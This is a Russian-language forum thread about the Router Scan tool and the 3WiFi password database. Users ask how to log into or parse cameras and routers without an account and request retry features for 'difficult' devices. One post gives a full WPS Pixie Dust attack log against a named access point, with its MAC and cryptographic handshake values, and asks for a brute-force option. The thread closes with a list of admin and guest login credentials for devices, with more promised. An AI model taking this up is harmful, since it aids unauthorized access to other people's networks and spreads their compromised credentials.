Хитрая камера... она не принимала авторизацию, пока HTTP заголовок Host был ниже заголовка Authorization. Небольшим хаком поправил это дело. Туда можно как-то войти / отпарсить без аккаунта? Может быть у вас есть логи HTTP запросов?
На всякий случай напоминаю для тех, кто не обратил внимания. Сейчас я вношу обновления с периодичностью полчаса-час. Сканирую и исправляю баги на ходу. И документацию пополняю.
Заметил одну особенность, если работа с роутером "встаёт" на каком то этапе, например определение/залогинивание/парсинг(например нет ответа от сервера на какой то дискретный запрос), весь процесс встаёт и заканчивается только по таймауту(или принудительно). Можно ли добавить локальные(для каждой операции) таймауты(скажем секунд 10-15), и пробовать ещё несколько раз? Дело в том что если устройство "трудное", а его хочется всё же отпарсить, приходится дринькать его <CTRL>-R в надежде что на этот раз повезёт, и оно не споткнётся снова на каком то этапе последовательности. Хотелось бы "докачку". А не качать снова. Конечно, если это слишком глобально, и придётся втыкать костыли, то фиг с этим.
Я установил таймауты чтения данных в HTTP запросах, раньше их не было. Можно ещё попробовать установить небольшой таймут для соединения, но не думаю, что это сильно поможет. И да, не для всех устройств такое будет работать. У некоторых из них есть свой таймаут логина пользователя.
да кстати давно подметил где раньше показывал в процентах вероятность совпадения пина теперь почти на всех адресах 0% пишет
Зайдите на 3WiFi и проверьте, выдаёт ли он тоже самое. Если выдаёт, то не надо сюда писать возможные баги, не относящиеся к RS.
да и сам 3WiFi по паре antichat antichat показывает пароли и прочую инфу по точкам чего быть как я понимаю не должно
раньше насколько я помню показывало только имя мак точки и всё а тут и пароль вдобавок ещё показывает тогда спрашивается для чего тогда это? "Введена платная регистрация аккаунтов"
Имя и мак точки отображается на карте без пароля, когда пользователь не выполнил вход на сайт. Гостевой аккаунт даёт доступ для участников сообщества, не имеющих возможность оплатить код приглашения. У пользовательских аккаунтов есть дополнительные преимущества. И давайте уже не будем здесь о 3WiFi, эта тема про Router Scan.
Не могли бы вы добавить параметры --force для pixiewps? Code: [*] Audit started at 2017.12.05 21:47:40 (UTC-03:00). [*] Associating with AP... [+] Associated with F6:F4:73:06:05:12 (ESSID: Alex Hilgert). [*] Trying pin "12345670"... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 1727C0167A4B752D5079D14C76C2A0FF [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: Realtek Semiconductor Corp. [*] Model Name: RTL8xxx [*] Model Number: EV-2010-09-20 [*] Serial Number: 123456789012347 [*] Device Name: RTK_AP [*] Sending WPS Message M2... [*] PKR: 04E36C25379C2043E95445B06EBB10487EFB76E3A7E5368BBF377F79AC7CC8766F1B5F3A549CC37784E50A0CB8FBDBBF9DC51630A8F8717B9FFB99E38DEA86CA9E3D6D49637C455866ED8E396224BDAB9ACE1AE9B4AFF54B3CA09707BA71C29159C0D610733BF76BA96C64CE406EA2D9C354A586FAD0BC856E12405A95494607B0D41D20C0BDED5F42E12D6C989D4320A8F189704EC05FC826250C6E7200F4F5CF11C947829130A16DA0014425D6BE327203360A2E3A4D0FE753FD86DE9763D9 [*] AuthKey: 1D727233C51B0DCBB144212FCAB20E315262BFE5840964C4A57E2C99FE60494C [*] Received WPS Message M3. [*] E-Hash1: EE3350BCA5CE1B569941A1BAD07A6A21A5F15384A40B8420CCF3E6DF8E35B74C [*] E-Hash2: B324FB1B2CA46B683E663B5EFC8E4366ADCB5F31922D2A6B5093EABB1180449C [*] Sending WPS Message M4... [*] Received WSC NACK. [-] Error: Wrong PIN code. [*] Sending WSC NACK... [*] EAP session closed. [*] Starting Pixie Dust attack... [*] The AP /might be/ vulnerable. [*] Try again with --force or with another (newer) set of data. [*] Also ensure that the date time and time zone on your computer are set correctly. [*] Audit stopped at 2017.12.05 21:47:56 (UTC-03:00).
Могу, но полный перебор занимает много времени, и пока он не завершится, у пользователя не будет возможности переключиться на аудит другой точки. Впрочем, если добавить возможность принудительной остановки pixiewps, то эта проблема будет исчерпана.
admin:[email protected]:80 admin:[email protected]:443 guest:[email protected]:81 или может ну их этих китайцев? а то я тут могу длинный список набросать...
